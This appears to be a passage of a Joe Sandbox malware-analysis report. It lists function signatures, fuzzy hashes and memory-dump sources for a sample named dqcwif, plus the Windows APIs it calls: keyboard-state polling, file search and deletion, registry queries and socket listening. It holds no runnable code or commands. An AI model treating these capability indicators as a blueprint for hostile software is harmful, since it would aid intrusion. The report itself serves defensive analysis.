                                                                                                          • Opcode ID: fcfcd3c85d5de11fcd116e00f6466421f1c918d309ac340d1a492b096d736d29
                                                                                                          • Instruction ID: 0652213553b1957785cff4ee9eebf956057bc2fe551916106bdcc6843fa86932
                                                                                                          • Opcode Fuzzy Hash: fcfcd3c85d5de11fcd116e00f6466421f1c918d309ac340d1a492b096d736d29
                                                                                                          • Instruction Fuzzy Hash: F7B2EA72A042828BE7658E2DD460AFD7791FB46B88F505135DB0997BCEDF38ED158B00
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: P
                                                                                                          • API String ID: 0-3110715001
                                                                                                          • Opcode ID: 89df1471032732431b81a05b11aefcbbc91b985f9c802d2c82d041fa720837f2
                                                                                                          • Instruction ID: f49bc24c351ab93994256c920f5e2cc56d547cf68274e6948095fd6988369ded
                                                                                                          • Opcode Fuzzy Hash: 89df1471032732431b81a05b11aefcbbc91b985f9c802d2c82d041fa720837f2
                                                                                                          • Instruction Fuzzy Hash: 25A1B432A0864186F724CF29D4246F9B760FB86F88F508136DB5E87A9ACF7DE945C700
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _get_daylight$ByteCharMultiWide_invalid_parameter_noinfo$InformationTimeZone
                                                                                                          • String ID: -$:$:$?
                                                                                                          • API String ID: 3440502458-92861585
                                                                                                          • Opcode ID: 2484a17d68417765dfea95e8ed30be907b8393143ee9075556b7ff4147a9153c
                                                                                                          • Instruction ID: 88c92d717e5ddf5f91da93b36755a86bb65ebc69d3ac5172f0bfeed55964f285
                                                                                                          • Opcode Fuzzy Hash: 2484a17d68417765dfea95e8ed30be907b8393143ee9075556b7ff4147a9153c
                                                                                                          • Instruction Fuzzy Hash: EDE1C232A1838286F7648F39A8615F9B791BF86F94F585135EB4E8268EDF3CDC418700
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Time$File$FindLocalSystem$CloseFirst
                                                                                                          • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                                          • API String ID: 3232708057-3289030164
                                                                                                          • Opcode ID: 5c779f221d7aeb540d444412295e12a250afa50e4e6d56f81e5e2491da9cccd3
                                                                                                          • Instruction ID: 2f532432f86feed05ca4c1a3c0650eecfa0f68168ac7d58bf4aea898bfa1ce8a
                                                                                                          • Opcode Fuzzy Hash: 5c779f221d7aeb540d444412295e12a250afa50e4e6d56f81e5e2491da9cccd3
                                                                                                          • Instruction Fuzzy Hash: 94D1C322B18A5295FB10DB69D4610FE6761FB82F94F804032EB4D87AAEDF7DD909C710
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                          • String ID: *.*
                                                                                                          • API String ID: 1409584000-438819550
                                                                                                          • Opcode ID: 8f313655dcbdbe42a35da08493f07892190d387efc47daab254f64e3a089ff94
                                                                                                          • Instruction ID: ca7533572160e11dbde8065ec827d22089c8f651bf333db00fbc7ca3fe82816e
                                                                                                          • Opcode Fuzzy Hash: 8f313655dcbdbe42a35da08493f07892190d387efc47daab254f64e3a089ff94
                                                                                                          • Instruction Fuzzy Hash: B141822160864295EB50DB2DE8646F963A1FB46FA4F844131DE6E876DEDF3CEC0AC710
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: SendString
                                                                                                          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                          • API String ID: 890592661-1007645807
                                                                                                          • Opcode ID: 6e164f36fc51d55b22e1026945b1aa4b641673a9c64d89865777c7d9524d423d
                                                                                                          • Instruction ID: 1c1ed9aff4f5dddab7654e08e945424d5ac616cb4df45d2d7d78a3d205a85348
                                                                                                          • Opcode Fuzzy Hash: 6e164f36fc51d55b22e1026945b1aa4b641673a9c64d89865777c7d9524d423d
                                                                                                          • Instruction Fuzzy Hash: B1219526B18A9395F720DB29E864AEA6720FFA6F44FD04031D74D8799EDE2CDD09C740
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: State$Async$Keyboard
                                                                                                          • String ID:
                                                                                                          • API String ID: 541375521-0
                                                                                                          • Opcode ID: 3846c89bd659206fb3b2d3285dc51d557998776e104b8ac6e0153ffc668b7184
                                                                                                          • Instruction ID: 7f427d8e5aa5efe3fbe5be9100ded3a62c68abf406c4b2b7e96b93d162cdfa74
                                                                                                          • Opcode Fuzzy Hash: 3846c89bd659206fb3b2d3285dc51d557998776e104b8ac6e0153ffc668b7184
                                                                                                          • Instruction Fuzzy Hash: 9671D212A4C6C285FB758B3890206F92BA1EB67F84F980039D78D436DBCE9DDD06C751
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                          • String ID: *.*
                                                                                                          • API String ID: 2640511053-438819550
                                                                                                          • Opcode ID: d607f8cd377dc7cb12783564cfab50aac2a1e28959c9b0777418728c286e0dff
                                                                                                          • Instruction ID: 2bb77b6f89a395693784c0e80a854a1ab8e39be1970ec27d04bc4eba0060ac29
                                                                                                          • Opcode Fuzzy Hash: d607f8cd377dc7cb12783564cfab50aac2a1e28959c9b0777418728c286e0dff
                                                                                                          • Instruction Fuzzy Hash: F641511160CA4395EA509B1DA8646F96390FF46FE4F905131DE6E876DEDF3CD80ACB10
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove
                                                                                                          • String ID: :$\$\??\%s
                                                                                                          • API String ID: 3827137101-3457252023
                                                                                                          • Opcode ID: c042ec0e4a157b4915e6cbee2efc7bd563a20e0e85c4cf7d435b60959deae5d8
                                                                                                          • Instruction ID: 6bb88836290e9ad8bdcb181b2eecbfcdf2c3c561acb5ca47f2dad0f59c15d06c
                                                                                                          • Opcode Fuzzy Hash: c042ec0e4a157b4915e6cbee2efc7bd563a20e0e85c4cf7d435b60959deae5d8
                                                                                                          • Instruction Fuzzy Hash: 8841952261868385E7609F29E8246FD63A0FF86B98F540135DB4D87B9EDF7CD946C700
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: QueryValue$Close$BuffCharConnectOpenRegistryUpper
                                                                                                          • String ID:
                                                                                                          • API String ID: 3218304859-0
                                                                                                          • Opcode ID: 56613195d31d9b8dc67beba3ae71979573c24aebd7d9093bc0b17d223b1a2dd4
                                                                                                          • Instruction ID: 64848287e4f883155a90a10335725c81aea16be27d493513d49b17f2b2408343
                                                                                                          • Opcode Fuzzy Hash: 56613195d31d9b8dc67beba3ae71979573c24aebd7d9093bc0b17d223b1a2dd4
                                                                                                          • Instruction Fuzzy Hash: 86F17032B05A4686EB10DF69D4A06EC37B0EB86F98B058131DF4D87B9ADF39E901C744
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                          • String ID:
                                                                                                          • API String ID: 2762341140-0
                                                                                                          • Opcode ID: 3f2bc404d53d5998161f0ee2b8df4f9bc3160e202cb50a098f9587f0d2c0f7e1
                                                                                                          • Instruction ID: 843bb8ea4cffc5128fb774615b34bd143237d732f7e4fab764a7115d4bc45c28
                                                                                                          • Opcode Fuzzy Hash: 3f2bc404d53d5998161f0ee2b8df4f9bc3160e202cb50a098f9587f0d2c0f7e1
                                                                                                          • Instruction Fuzzy Hash: B1C13736A04B8585EB10DF6AD8A41ED67A0FB8AF94F054036DF4E87B6ACF39D945C700
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                          • String ID:
                                                                                                          • API String ID: 1255039815-0
                                                                                                          • Opcode ID: 5c88d37276b46e33d2a1e391526b812f5276439b55f88bb912c7bbc104166e1e
                                                                                                          • Instruction ID: 5707d100e44e76596ad63497910feb466059b9dddf11876e7f4e837a45e637ea
                                                                                                          • Opcode Fuzzy Hash: 5c88d37276b46e33d2a1e391526b812f5276439b55f88bb912c7bbc104166e1e
                                                                                                          • Instruction Fuzzy Hash: E2618D66B04A5286EB10DF69D860AFC37A4BB45F88B04A036DF1D97BDADF38D845C340
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$LongWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 312131281-0
                                                                                                          • Opcode ID: abdc22e6bb891721ce5e067b69be811f88521fd2379c3c8bf9918a79da049ba4
                                                                                                          • Instruction ID: 82b972203f3bdf663c9390e643c9c76ecbaca3c9bab8840b0e91b5a87a16f75e
                                                                                                          • Opcode Fuzzy Hash: abdc22e6bb891721ce5e067b69be811f88521fd2379c3c8bf9918a79da049ba4
                                                                                                          • Instruction Fuzzy Hash: AB71B036605A9186E760DF69D854AED3760FB8AF94F504036DB4D83BAACF3CD986C700
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$Find$Delete$AttributesCloseCopyFirstFullMoveNameNextPath
                                                                                                          • String ID: \*.*
                                                                                                          • API String ID: 4047182710-1173974218
                                                                                                          • Opcode ID: 3e5e0e112cc80aa2c2516f057e4a01b659553512389772208b3739e74699da54
                                                                                                          • Instruction ID: 72f71be16a43f4f14c87e13fd05b5c21f4015543cae2bdf422af74c11f5f3e40
                                                                                                          • Opcode Fuzzy Hash: 3e5e0e112cc80aa2c2516f057e4a01b659553512389772208b3739e74699da54
                                                                                                          • Instruction Fuzzy Hash: A7816422A0C64295FB10DB69E4611FD6B60FF95B94F801032EB4E869AFDF7CD949C710
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _get_daylight_invalid_parameter_noinfo$ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone
                                                                                                          • String ID: ?
                                                                                                          • API String ID: 500310315-1684325040
                                                                                                          • Opcode ID: 94c2f1c66049ff4599948a3e12081019eb49e95131d575ab39d1df6a0a8379ea
                                                                                                          • Instruction ID: ec0a679376913f97bf2376227ad5eabb68653eadbcb69461a4c1fea9bfbefad8
                                                                                                          • Opcode Fuzzy Hash: 94c2f1c66049ff4599948a3e12081019eb49e95131d575ab39d1df6a0a8379ea
                                                                                                          • Instruction Fuzzy Hash: D1617E72A1878286F7609F29E8605F9B7A5FF85B94F440136EB0DC669ADF3CEC418740
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                                          • String ID:
                                                                                                          • API String ID: 540024437-0
                                                                                                          • Opcode ID: f24216cf85a9cfc84ec9f45b81836fed2d974ebfd3edccbe64e1b0b478a4ea6b
                                                                                                          • Instruction ID: 24ad7afc7b11a39a027bff410365d568fac54f6a74705a3d85e0e29f7b970073
                                                                                                          • Opcode Fuzzy Hash: f24216cf85a9cfc84ec9f45b81836fed2d974ebfd3edccbe64e1b0b478a4ea6b
                                                                                                          • Instruction Fuzzy Hash: 30417172A0868286EB14EF1E94A02AC6B50FB86F90F454534DB5E8779BCF7DD9418704
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: NULL Pointer assignment$Not an Object type
                                                                                                          • API String ID: 0-572801152
                                                                                                          • Opcode ID: 3b41e49848b2a854f69dbea14d55eff9d78a714003a2fd806a44bf0603c53a60
                                                                                                          • Instruction ID: acc65b2ea5de79757845a8b668dbd2af2b76e7b4d78ec6fcc04594b7fc543af3
                                                                                                          • Opcode Fuzzy Hash: 3b41e49848b2a854f69dbea14d55eff9d78a714003a2fd806a44bf0603c53a60
                                                                                                          • Instruction Fuzzy Hash: 58E1E336A08B8286EB50DF29D4902ED77A0FB89B98F404136EF4D97B99DF78D945C700
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                          • String ID: \*.*
                                                                                                          • API String ID: 2649000838-1173974218
                                                                                                          • Opcode ID: 33faa39baa03be8120850797a18634ea376334063adf963c1f4e83021c640b6d
                                                                                                          • Instruction ID: b1bc46293d36e121d02d4939aa83f48f233af7fd033ead75f0c5df5352d0a88b
                                                                                                          • Opcode Fuzzy Hash: 33faa39baa03be8120850797a18634ea376334063adf963c1f4e83021c640b6d
                                                                                                          • Instruction Fuzzy Hash: F5419F22A28A4292EB50DB28E8615ED6760FF95F90F901031EB5E836DFCF7CD905CB10
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
